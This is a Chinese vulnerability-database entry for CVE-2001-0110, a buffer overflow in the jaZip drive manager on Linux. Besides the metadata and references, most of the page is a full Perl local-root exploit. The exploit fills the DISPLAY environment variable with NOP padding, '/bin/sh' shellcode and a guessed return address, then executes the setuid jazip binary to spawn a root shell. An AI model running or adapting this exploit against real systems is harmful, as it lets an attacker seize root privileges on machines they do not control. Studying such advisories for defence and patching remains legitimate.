jaZip Zip/Jaz驱动管理器缓冲区溢出漏洞

jaZip Zip/Jaz驱动管理器缓冲区溢出漏洞

漏洞ID 1106186 漏洞类型 缓冲区溢出
发布时间 2001-01-25 更新时间 2005-05-02
图片[1]-jaZip Zip/Jaz驱动管理器缓冲区溢出漏洞-安全小百科CVE编号 CVE-2001-0110
图片[2]-jaZip Zip/Jaz驱动管理器缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200103-024
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/257
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-024
|漏洞详情
jaZipZip/Jaz驱动管理器存在缓冲区溢出漏洞。本地用户借助超长DISPLAY环境变量提升根目录特权。
|漏洞EXP
#!/usr/bin/perl

## jaZip Exploit / Tested version: jaZip-0.32-2 / anno 2000
## <[email protected]> ||  http://teleh0r.cjb.net/ 
## Vulnerable: Turbolinux 6.0
##
## [teleh0r@localhost teleh0r]$ rpm -q jaZip
## jaZip-0.32-2
## [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
## Address: 0xbffff7ac
## bash#


$shellcode =                     # Shellcode by: Taeho Oh
    "xebx1f".                  #/* jmp 0x1f              */
    "x5e".                      #/* popl %esi             */
    "x89x76x08".              #/* movl %esi,0x8(%esi)   */
    "x31xc0".                  #/* xorl %eax,%eax        */
    "x88x46x07".              #/* movb %eax,0x7(%esi)   */
    "x89x46x0c".              #/* movl %eax,0xc(%esi)   */
    "xb0x0b".                  #/* movb $0xb,%al         */
    "x89xf3".                  #/* movl %esi,%ebx        */
    "x8dx4ex08".              #/* leal 0x8(%esi),%ecx   */
    "x8dx56x0c".              #/* leal 0xc(%esi),%edx   */
    "xcdx80".                  #/* int $0x80             */
    "x31xdb".                  #/* xorl %ebx,%ebx        */
    "x89xd8".                  #/* movl %ebx,%eax        */
    "x40".                      #/* inc %eax              */
    "xcdx80".                  #/* int $0x80             */
    "xe8xdcxffxffxff".      #/* call -0x24            */
    "/bin/sh";                   #/* .string "/bin/sh"   */


$ret = 0xbffff7ac;  # May have to be modified.
$len = 2100;
$nop = 'A';

if (@ARGV == 1) {
    $offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print("Address: 0x", sprintf('%lx',($ret + $offset)), "n");
$new_ret = pack('l',($ret + $offset));
$buffer .= $nop x 3; # May have to be modified / 5 for Debian.

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

if ($ENV{'DISPLAY'}) {
    delete($ENV{'DISPLAY'});
}

local($ENV{'DISPLAY'}) = $buffer;
exec("/usr/X11R6/bin/jazip");


# milw0rm.com [2001-01-25]
|参考资料

来源:DEBIAN
名称:DSA-017
链接:http://www.debian.org/security/2001/dsa-017
来源:BID
名称:2209
链接:http://www.securityfocus.com/bid/2209
来源:BUGTRAQ
名称:20010114VulnerabilityinjaZip.
链接:http://archives.neohapsis.com/archives/bugtraq/2001-01/0228.html
来源:XF
名称:jazip-display-bo(5942)
链接:http://xforce.iss.net/static/5942.php

相关推荐: PHP-Nuke 6.5 Addon – ‘Viewpage.php’ File Disclosure

PHP-Nuke 6.5 Addon – ‘Viewpage.php’ File Disclosure 漏洞ID 1107256 漏洞类型 发布时间 2003-03-25 更新时间 2003-03-25 CVE编号 CVE-2003-1545 CNNVD-ID…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享